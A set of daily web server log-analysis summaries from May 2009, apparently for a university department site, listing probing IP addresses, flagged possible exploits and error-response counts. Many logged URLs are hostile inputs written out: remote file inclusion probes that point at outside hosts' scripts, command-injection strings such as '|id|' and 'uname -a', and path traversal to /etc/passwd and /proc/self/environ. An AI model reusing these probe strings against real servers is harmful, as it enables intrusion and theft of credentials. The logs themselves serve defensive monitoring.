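A 200 on a traversal request only means the page did not error out; as the May 14th notes say, it may simply have fallen through to the home page, so each flagged URL still needs to be replayed against a copy of the script to see what it actually returned.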
May 16, 2009 Log Analysis
404's
//ee_commerce/paypalcart.php?toroot=http:/ ... MADONGCMD.txt??: 3 Time(s)
//include/admin.lib.inc.php?site_path=http ... s/93/yes.txt???: 1 Time(s)
//include/print_category.php?setup[use_cat ... wap.sh/id.txt??: 2 Time(s)
//photo_comment.php?toroot=http://www.trit ... m/2009/id.txt??: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 3 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s)
/Papers/ASNE2002Paper.pdf: 1 Time(s)
/Space/archives/000786.html: 4 Time(s)
/_vti_bin/_vti_aut/author.dll: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 3 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 4 Time(s)
/_vti_inf.html: 4 Time(s)
/awstats.pl?configdir=%7Cecho%20;echo%20;i ... o%20;echo%20%7C: 1 Time(s)
/cgi-bin/MachineInfo/cgi-bin/wrap/gurdal/: 1 Time(s)
/cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C: 1 Time(s)
/cgi-bin/awstats.pl?configdir=%7Cecho%20;e ... o%20;echo%20%7C: 1 Time(s)
/cgi-bin/index.cgi?page=%7Cuname%20-a;id%7C: 1 Time(s)
/cgi-bin/kerbynet?Section=NoAuthREQ&Action ... ype=*%22;id;%22: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=449: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1134: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s)
/cgi-bin/news.cgi?id=%7Cid%7C: 1 Time(s)
/cgi-bin/quikstore.cgi?category=%7Cid%7C: 1 Time(s)
/cgi-bin/shop.pl/page=%7Cid%7C: 1 Time(s)
/cgi-sys/guestbook.cgi?user=cpanel&template=%7Cid%7C: 1 Time(s)
/computing/faq/displayfaq.php?area_id=5: 1 Time(s)
/main.cgi/file.txt?down_num=953713356&boar ... ile.txt%7Cid%7C: 1 Time(s)
/organizations/aiaa/gallery/gallery1/0708officers.JPG: 1 Time(s)
/organizations/aiaa/gallery/gallery1/officer2008.jpg: 1 Time(s)
/organizations/aiaa/gallery/gallery2/01-0412080919.jpg: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=3&pic=2: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=4&pic=1: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=4&pic=10: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=4&pic=11: 1 Time(s)
/organizations/aiaa/index.php?go=calendar: 1 Time(s)
/organizations/aiaa/index.php?go=contacts: 2 Time(s)
/organizations/aiaa/index.php?go=links: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 2 Time(s)
/organizations/index.php?inc=http://indoir ... o/idscan.txt???: 1 Time(s)
/organizations/vtsgt/gallery/add_comment.p ... lery_popup=true: 1 Time(s)
/organizations/vtsgt/index.php?inc=http:// ... o/idscan.txt???: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=1: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=2: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=4: 2 Time(s)
/saffairs/pages/r/?Trans-union-free-credit-report-1/: 1 Time(s)
/search.php: 14 Time(s)
/services/help/?show=about&module=;%22.passthru(%22id%22);: 1 Time(s)
/shop.pl/page=%7Cid%7C: 1 Time(s)
/skin_shop/standard/3_plugin_twindow/twind ... /scripts/test??: 1 Time(s)
/technote/main.cgi/file.txt?down_num=95371 ... ile.txt%7Cid%7C: 1 Time(s)
/twiki/bin/configure?action=image;image=%7Cid%7C;type=text: 1 Time(s)
/undergraduate: 1 Time(s)
/~cwoolsey//photo_comment.php?toroot=http: ... m/2009/id.txt??: 1 Time(s)
/~cwoolsey/Advisees//photo_comment.php?tor ... m/2009/id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate//ee_comm ... MADONGCMD.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate//photo_c ... m/2009/id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... MADONGCMD.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... m/2009/id.txt??: 1 Time(s)
/~hokiesat/subs/wiring//include/admin.lib. ... s/93/yes.txt???: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff//includ ... s/93/yes.txt???: 1 Time(s)
/~lscharf/scripts/homepages.php.txt%20%20/ ... br/fx29id.txt??: 1 Time(s)
/~lscharf/scripts/homepages.php.txt%20%20/ ... t/fx29id1.txt??: 1 Time(s)
/~mason//include/print_category.php?setup[ ... wap.sh/id.txt??: 2 Time(s)
/~mason//photo_comment.php?toroot=http://w ... m/2009/id.txt??: 1 Time(s)
/~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s)
/~mason/Mason_f//ee_commerce/paypalcart.ph ... MADONGCMD.txt??: 1 Time(s)
/~mason/Mason_f//include/print_category.ph ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f//photo_comment.php?toroot= ... m/2009/id.txt??: 1 Time(s)
/~mason/Mason_f/747CONF.INP//include/print ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/M96SAE.pdf//include/print_ ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf%20%20 ... m/2009/id.txt??: 1 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf//ee_c ... MADONGCMD.txt??: 1 Time(s)
/~mason/Mason_f/favicon.ico: 4 Time(s)
/~mason/Mason_f/skin_shop/standard/3_plugi ... /scripts/test??: 1 Time(s)
http://www.aoe.vt.edu/~devenpor/aoe5104/2% ... 2520Algebra.pdf: 1 Time(s)
405 Method Not Allowed
/~cdhall/: 1 Time(s)
/~hokiesat/: 6 Time(s)
/~mason/: 3 Time(s)
May 17, 2009 Log Analysis
A total of 2 sites probed the server
132.205.95.71 174.35.250.57
404's
//assets/snippets/reflect/snippet.reflect. ... /scripts/test??: 1 Time(s)
//components/com_extcalendar/errors.php?er ... s/kampret.jpg??: 1 Time(s)
//include/print_category.php?setup[use_cat ... wap.sh/id.txt??: 2 Time(s)
//skin/zero_vote/setup.php?%20dir=http://d ... wap.sh/id.txt??: 3 Time(s)
/3DLDV/wb23000/data.html: 1 Time(s)
/alumni/alumnilist.php?class=http://owned- ... luelinebe.html?: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/computing/faq/displayfaq.php?area_id=3: 2 Time(s)
/computing/faq/displayfaq.php?area_id=4: 1 Time(s)
/organizations/aiaa/show_news.php?cutepath ... og/fx29id.txt??: 1 Time(s)
/organizations/show_news.php?cutepath=http ... og/fx29id.txt??: 1 Time(s)
/show_news.php?cutepath=http://212.227.74. ... og/fx29id.txt??: 1 Time(s)
/~mason//include/print_category.php?setup[ ... wap.sh/id.txt??: 2 Time(s)
/~mason//skin/zero_vote/setup.php?%20dir=h ... wap.sh/id.txt??: 3 Time(s)
/~mason/Mason/ACiX29.htmlects/s37/index.ht ... tml\x9f\xfe\xff: 1 Time(s)
/~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s)
/~mason/Mason_f//assets/snippets/reflect/s ... /scripts/test??: 1 Time(s)
/~mason/Mason_f//include/print_category.ph ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f//skin/zero_vote/setup.php? ... wap.sh/id.txt??: 3 Time(s)
/~mason/Mason_f/747CONF.INP//include/print ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/747CONF.INP//skin/zero_vot ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/M96SAE.pdf//include/print_ ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... wap.sh/id.txt??: 3 Time(s)
May 18, 2009 Log Analysis
A total of 8 sites probed the server
189.8.13.18 208.94.173.99 217.218.82.15 58.214.162.140 79.233.147.7 80.191.127.196 82.19.44.18 94.169.92.137
403's
/research/: 13 Time(s)
/research/?area_id=1: 2 Time(s)
/research/?area_id=2: 3 Time(s)
/research/?area_id=3: 1 Time(s)
/research/?area_id=4: 1 Time(s)
/research/?area_id=5: 1 Time(s)
/research/?area_id=6: 1 Time(s)
404's
/%7Eciochett/lit/zen.html: 1 Time(s)
/%7Emason/Mason_f/errors.php?error=http:// ... hu/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/viewitem. ... hu/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/viewitem. ... oc/self/environ: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/viewitem. ... self/environ%00: 1 Time(s)
/%7Emason/errors.php?error=http://www.fmf2 ... hu/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/viewitem.php?Code ... hu/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/viewitem.php?Code ... oc/self/environ: 1 Time(s)
/%7Emason/source/mod/rss/viewitem.php?Code ... self/environ%00: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s)
/\xef\xbd\x9emason/Mason_f/icase_paper95.pdf: 1 Time(s)
/alumni/news.php?gashar=GASHAR&back_eval=p ... =SBD_MAKE_VOICE: 1 Time(s)
/cart.php?category_id=': 2 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/display.php?pg=http://www.5d-gaming.org/b/iid.txt??: 1 Time(s)
/errors.php?error=http://www.fmf2004.hu/buggsbunny??: 1 Time(s)
/ferror.txt: 1 Time(s)
/forum/index.php: 1 Time(s)
/forums/index.php: 1 Time(s)
/news.php?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 2 Time(s)
/organizations/aiaa/index.php?go=../../../ ... ./../etc/passwd: 1 Time(s)
/organizations/aiaa/index.php?go=../../../ ... ./etc/passwd%00: 2 Time(s)
/organizations/aiaa/index.php?go=contacts: 2 Time(s)
/organizations/aiaa/index.php?go=links: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 1 Time(s)
/organizations/aiaa/index.php?start_from=2 ... subaction=&id=&: 1 Time(s)
/organizations/sname/ingalls02pics/plas%25 ... 2520cutting.jpg: 2 Time(s)
/organizations/sname/ingalls02pics/plate%2 ... las%2520arc.jpg: 2 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=408: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=409: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=413: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=414: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=419: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=420: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=421: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=422: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=424: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=425: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=426: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=427: 2 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=428: 2 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=429: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=480: 1 Time(s)
/source/mod/rss/viewitem.php?Codebase=../. ... oc/self/environ: 1 Time(s)
/source/mod/rss/viewitem.php?Codebase=../. ... self/environ%00: 1 Time(s)
/source/mod/rss/viewitem.php?Codebase=http ... hu/buggsbunny??: 1 Time(s)
/~dare/me/punk/rocker.html: 1 Time(s)
/~elseifi: 1 Time(s)
/~grasmeye/photos/allison/: 2 Time(s)
/~grasmeye/photos/allison/billstory.html: 1 Time(s)
/~grasmeye/photos/index.html: 2 Time(s)
405 Method Not Allowed
/ferror.txt: 1 Time(s)
/~hokiesat/: 1 Time(s)
/~mason/: 1 Time(s)
416 Request Range Not Satisfiable
/~kashin/courses/aoe4065/Files/SystemAnalysis.pdf: 1 Time(s)
May 19, 2009 Log Analysis
A total of 7 sites probed the server
121.246.105.26 140.159.2.32 141.212.51.1 59.180.142.136 76.4.48.141 90.215.231.235 91.212.16.8
400 Bad Request
www.aoe.vt.edu/news/news.php?gashar=GASHAR ... =SBD_MAKE_VOICE: 1 Time(s)
404's
///google.ro/path=http://208.98.22.241/id.txt????: 1 Time(s)
//bemarket/postscript/postscript.php?p_mod ... load/pw.txt????: 1 Time(s)
//board/board.php?code=http://163.26.12.232/gambar.jpg???: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s)
/calendars/phpScheduleIt/reserve.php: 1 Time(s)
/calendars/phpScheduleIt/roschedule.php?da ... 008&scheduleid=: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 4 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1134: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/people//board/board.php?code=http://163.2 ... 2/gambar.jpg???: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/// ... .241/id.txt????: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/Ro ... .241/id.txt????: 1 Time(s)
/~gaylord//bemarket/postscript/postscript. ... load/pw.txt????: 1 Time(s)
/~gaylord/ps.to.eps.html//bemarket/postscr ... load/pw.txt????: 1 Time(s)
May 20, 2009 Log Analysis
A total of 4 sites probed the server
143.248.72.100 205.243.148.151 67.19.50.178 90.55.42.112
A total of 3 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit):
/index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
/~lscharf/scripts/homepages.php.txt/index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
/~lscharf/scripts/index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200
Requests with error response codes
400 Bad Request
HTTP/1.1: 10 Time(s)
404's
//photo_comment.php?toroot=http://www.die- ... ad/fx29id.txt??: 1 Time(s)
/3DLDV/wb23000/data.html: 2 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 2 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 4 Time(s)
/Papers/ASNE2002Paper.pdf: 1 Time(s)
/Papers/SNAME2003Grounding2.pdf: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 2 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 4 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 4 Time(s)
/_vti_inf.html: 4 Time(s)
/cgi-bin/MachineInfo/cgi-bin/wrap/gurdal/: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&s ... ower+system+ppt: 1 Time(s)
/include/images/trans.gif: 113 Time(s)
/include/lib.inc.php?site_path=http://www. ... aries/id.txt???: 2 Time(s)
/mail//bin/msgimport: 5 Time(s)
/mail2//bin/msgimport: 5 Time(s)
/mss2//bin/msgimport: 5 Time(s)
/notified-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR ... 0YxNlMwNC5wZGY=: 1 Time(s)
/notified-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR ... 29uaWNzLnBkZg==: 1 Time(s)
/pubs/catalog/c523.htm: 1 Time(s)
/rc//bin/msgimport: 5 Time(s)
/rms//bin/msgimport: 5 Time(s)
/round//bin/msgimport: 5 Time(s)
/roundcube-0.1//bin/msgimport: 5 Time(s)
/roundcube-0.2//bin/msgimport: 5 Time(s)
/roundcube//bin/msgimport: 5 Time(s)
/roundcubemail-0.1//bin/msgimport: 5 Time(s)
/roundcubemail-0.2//bin/msgimport: 5 Time(s)
/roundcubemail//bin/msgimport: 5 Time(s)
/search.php: 6 Time(s)
/sitemap.xml: 1 Time(s)
/verify-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR1L ... 0YxNlMwNC5wZGY=: 1 Time(s)
/verify-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR1L ... 29uaWNzLnBkZg==: 1 Time(s)
/webmail//bin/msgimport: 5 Time(s)
/webmail2//bin/msgimport: 5 Time(s)
/wm//bin/msgimport: 5 Time(s)
/~cdhall/MyMaps/Usage%20&%20FAQ.txt//?file ... ips_w/id.txt???: 1 Time(s)
/~cwoolsey//photo_comment.php?toroot=http: ... ad/fx29id.txt??: 1 Time(s)
/~cwoolsey/Advisees//photo_comment.php?tor ... ad/fx29id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate//photo_c ... ad/fx29id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... ad/fx29id.txt??: 1 Time(s)
/~hokiesat/hsat_files/filelist.xml: 1 Time(s)
/~hokiesat/include/lib.inc.php?site_path=h ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/gps-crosslink/Final%20APL% ... tation/out.html: 1 Time(s)
/~hokiesat/subs/include/lib.inc.php?site_p ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/power/S02%20documenta...ec ... ia/Roseid.txtt?: 3 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/Big%20B ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/include ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/wiring/include/lib.inc.php ... aries/id.txt???: 2 Time(s)
/~mason/Mason_f/M96SC10.pdf//?f=http://www ... ia/Roseid.txtt?: 3 Time(s)
405 Method Not Allowed
/~hokiesat/: 6 Time(s)
/~mason/: 3 Time(s)
416 Request Range Not Satisfiable
/~mason/Mason_f/ConfigAeroHiLift.pdf: 1 Time(s)
May 20, 2009 Log Analysis
A total of 6 sites probed the server
188.129.88.254 193.109.135.145 200.234.200.158 210.5.217.218 65.23.154.225 85.241.26.61
A total of 2 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit):
/index.php?go=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP Response 200
/index.php?go=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 200
400 Bad Request
/404.shtml: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
403 Forbidden
/research/: 20 Time(s)
/research/?area_id=4: 1 Time(s)
/research/?area_id=6: 1 Time(s)
/research/?mode=area_selected&thesis_area=1: 1 Time(s)
/research/?mode=area_selected&thesis_area=2: 1 Time(s)
/research/?mode=area_selected&thesis_area=3: 1 Time(s)
/research/?mode=area_selected&thesis_area=4: 1 Time(s)
/research/?mode=area_selected&thesis_area=5: 1 Time(s)
/research/?mode=area_selected&thesis_area=6: 1 Time(s)
/robots.txt: 33 Time(s)
404 Not Found
/%7Emason/Mason_f/errors.php?error=http:// ... ca/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/view.php? ... ca/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/view.php? ... oc/self/environ: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/view.php? ... self/environ%00: 1 Time(s)
/%7Emason/errors.php?error=http://www.long ... ca/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/view.php?Codebase ... ca/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/view.php?Codebase ... oc/self/environ: 1 Time(s)
/%7Emason/source/mod/rss/view.php?Codebase ... self/environ%00: 1 Time(s)
////Packages.php?sourcedir=http://dunpo.wi ... et/id.txt?%0D??: 2 Time(s)
//beacon/language/1/splash.lang.php?langua ... oc/self/environ: 1 Time(s)
//beacon/language/1/splash.lang.php?langua ... self/environ%00: 1 Time(s)
//include/bbs.lib.inc.php?site_path=http:/ ... data/idfx1.txt?: 1 Time(s)
//new.php?id=http://80.24.176.145/time//appserv/file.txt???: 1 Time(s)
//photo_comment.php?toroot=http://rsh.kiev ... ges/idfx1.txt??: 2 Time(s)
//plugins/dbal.php?eqdkp_root_path=http:// ... aries/id.txt???: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/_vti_aut/author.dll: 2 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 4 Time(s)
/_vti_inf.html: 4 Time(s)
/a: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1331: 4 Time(s)
/cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&s ... esigns+for+kids: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi/1202: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/errors.php?error=http://www.longbeachphot ... ca/buggsbunny??: 3 Time(s)
/favicon.ico: 24 Time(s)
/general.php: 22 Time(s)
/giving/general.php: 1 Time(s)
/giving/wishlist.php: 2 Time(s)
/groups/caplab/research/capvte: 1 Time(s)
/help/login.php?PHPSESSID=02c369bd3ef20d55d6142b896b18b2f9: 1 Time(s)
/home.php?pg=../../../../../../../../../.. ... oc/self/environ: 1 Time(s)
/home.php?pg=../../../../../../../../../.. ... self/environ%00: 1 Time(s)
/home.php?pg=http://www.longbeachphotosbc.ca/buggsbunny??: 1 Time(s)
/news//new.php?id=http://80.24.176.145/tim ... erv/file.txt???: 1 Time(s)
/organizations//beacon/language/1/splash.l ... oc/self/environ: 1 Time(s)
/organizations//beacon/language/1/splash.l ... self/environ%00: 1 Time(s)
/organizations/aiaa: 1 Time(s)
/organizations/aiaa/: 3 Time(s)
/organizations/aiaa//beacon/language/1/spl ... oc/self/environ: 1 Time(s)
/organizations/aiaa//beacon/language/1/spl ... self/environ%00: 1 Time(s)
/organizations/aiaa/errors.php?error=http: ... ca/buggsbunny??: 2 Time(s)
/organizations/aiaa/home.php?pg=../../../. ... oc/self/environ: 1 Time(s)
/organizations/aiaa/home.php?pg=../../../. ... self/environ%00: 1 Time(s)
/organizations/aiaa/home.php?pg=http://www ... ca/buggsbunny??: 1 Time(s)
/organizations/aiaa/images/Joshua_Davidson_Personal.jpg: 1 Time(s)
/organizations/aiaa/index.php: 1 Time(s)
/organizations/aiaa/index.php?go=../../../ ... oc/self/environ: 1 Time(s)
/organizations/aiaa/index.php?go=../../../ ... self/environ%00: 1 Time(s)
/organizations/aiaa/index.php?go=companies: 1 Time(s)
/organizations/aiaa/index.php?go=contacts: 3 Time(s)
/organizations/aiaa/index.php?go=http://ww ... ca/buggsbunny??: 1 Time(s)
/organizations/aiaa/index.php?go=links: 2 Time(s)
/organizations/aiaa/index.php?go=whatisaiaa: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 1 Time(s)
/organizations/aiaa/index.php?start_from=0 ... &subaction=&id=: 1 Time(s)
/organizations/aiaa/index.php?start_from=2 ... &subaction=&id=: 1 Time(s)
/organizations/aiaa/lutze/health/canadian- ... acy-viagra.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-ca ... acy-dosage.html: 1 Time(s)
/organizations/errors.php?error=http://www ... ca/buggsbunny??: 2 Time(s)
/organizations/home.php?pg=../../../../../ ... oc/self/environ: 1 Time(s)
/organizations/home.php?pg=../../../../../ ... self/environ%00: 1 Time(s)
/organizations/home.php?pg=http://www.long ... ca/buggsbunny??: 1 Time(s)
/organizations/index.php: 1 Time(s)
/organizations/index.php?go=../../../../.. ... oc/self/environ: 1 Time(s)
/organizations/index.php?go=../../../../.. ... self/environ%00: 1 Time(s)
/organizations/index.php?go=companies: 1 Time(s)
/organizations/index.php?go=contacts: 1 Time(s)
/organizations/index.php?go=http://www.lon ... ca/buggsbunny??: 1 Time(s)
/organizations/index.php?go=links: 1 Time(s)
/organizations/index.php?go=whatisaiaa: 1 Time(s)
/organizations/index.php?go=whatwedo: 1 Time(s)
/source/mod/rss/view.php?Codebase=../../.. ... oc/self/environ: 1 Time(s)
/source/mod/rss/view.php?Codebase=../../.. ... self/environ%00: 1 Time(s)
/source/mod/rss/view.php?Codebase=http://w ... ca/buggsbunny??: 1 Time(s)
/sources/lostpw.php?CONFIG[path]=http://du ... et/id.txt?%0D??: 2 Time(s)
/~cdhall/papers/AIAA-11014-738.pdf//?r=htt ... om/fx29id.txt??: 1 Time(s)
/~cwoolsey//photo_comment.php?toroot=http: ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey//plugins/dbal.php?eqdkp_root_pa ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Advisees//photo_comment.php?tor ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey/Advisees/Undergraduate//photo_c ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey/Courses//plugins/dbal.php?eqdkp ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Courses/AOE3134//plugins/dbal.p ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental//p ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/Ro ... aries/id.txt???: 2 Time(s)
/~durham/AOE5214/Ch08.pdf//?x=http://www.r ... a2/drivid.txt??: 1 Time(s)
/~hokiesat//include/bbs.lib.inc.php?site_p ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/Plans_Procedures_and_Results/Te ... es/editdata.mso: 2 Time(s)
/~hokiesat/index2_files/filelist.xml: 1 Time(s)
/~hokiesat/subs//include/bbs.lib.inc.php?s ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/subs/wiring//include/bbs.lib.in ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff//includ ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/Big%20B ... data/idfx1.txt?: 1 Time(s)
/~lscharf/scripts/homepages.php.txt%20%20/ ... om/fx29id.txt??: 2 Time(s)
/~mason//photo_comment.php?toroot=http://r ... ges/idfx1.txt??: 2 Time(s)
/~mason/Mason////Packages.php?sourcedir=ht ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/ACinfoTOC.html////Packages.p ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/ACinfoTOC.html//?sourcedir=h ... .241/id.txt????: 1 Time(s)
/~mason/Mason/ACinfoTOC.html//?sourcedir=h ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/ACinfoTOC.html/sources/lostp ... et/id.txt?%0D??: 2 Time(s)
